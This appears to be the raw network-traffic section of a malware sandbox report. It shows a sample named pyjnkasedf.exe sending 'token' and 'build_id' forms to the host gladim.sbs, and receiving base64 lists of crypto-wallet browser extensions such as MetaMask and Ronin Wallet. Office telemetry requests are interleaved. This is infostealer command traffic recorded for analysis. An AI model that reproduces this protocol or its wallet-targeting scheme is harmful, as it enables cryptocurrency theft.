                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:13 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 467
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                                                                      x-ms-request-id: 3360fb1d-601e-0097-3291-3ff33a000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213813Z-174f7845968j6t2phC1EWRcfe8000000125g00000000844m
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:13 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      15192.168.2.104971994.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:14 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAKFIDHDGIEGCAKFIIJK
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 331
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:14 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 4b 46 49 44 48 44 47 49 45 47 43 41 4b 46 49 49 4a 4b 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------DAKFIDHDGIEGCAKFIIJKContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------DAKFIDHDGIEGCAKFIIJKCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:14 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:14 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:14 UTC5837INData Raw: 31 36 63 30 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                                                                                                                                                                                                      Data Ascii: 16c0TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      16192.168.2.104972113.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:15 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                                                                      x-ms-request-id: 0e4b52e2-401e-0064-0222-4354af000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213815Z-174f7845968swgbqhC1EWRmnb4000000125000000000984w
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      17192.168.2.104972013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:15 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB344914B"
                                                                                                                                                                                                                                                      x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213815Z-174f7845968qj8jrhC1EWRh41s00000011vg00000000kfmg
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      18192.168.2.104972213.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:15 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 427
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                                                                      x-ms-request-id: 9380d969-e01e-001f-534d-401633000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213815Z-174f7845968nxc96hC1EWRspw800000011p000000000fdk3
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      19192.168.2.104972313.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:15 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 486
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                                                                      x-ms-request-id: 957c193a-901e-008f-36b3-4267a6000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213815Z-174f7845968psccphC1EWRuz9s000000125000000000k1e2
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      20192.168.2.104972413.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:15 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:16 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:15 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 407
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9698189B"
                                                                                                                                                                                                                                                      x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213815Z-174f7845968cpnpfhC1EWR3afc00000011k000000000dyb1
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:16 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      21192.168.2.104972594.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:16 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HCFCAAEBGCAKKFIDBKJJ
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 332
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:16 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 46 43 41 41 45 42 47 43 41 4b 4b 46 49 44 42 4b 4a 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------HCFCAAEBGCAKKFIDBKJJContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------HCFCAAEBGCAKKFIDBKJJCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:17 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:17 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:17 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      22192.168.2.104972613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:17 UTC192OUTGET /rules/rule120620v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:17 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:17 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 469
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BBA701121"
                                                                                                                                                                                                                                                      x-ms-request-id: d85cda50-501e-000a-581c-410180000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213817Z-174f7845968pght8hC1EWRyvxg000000053g00000000bue4
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
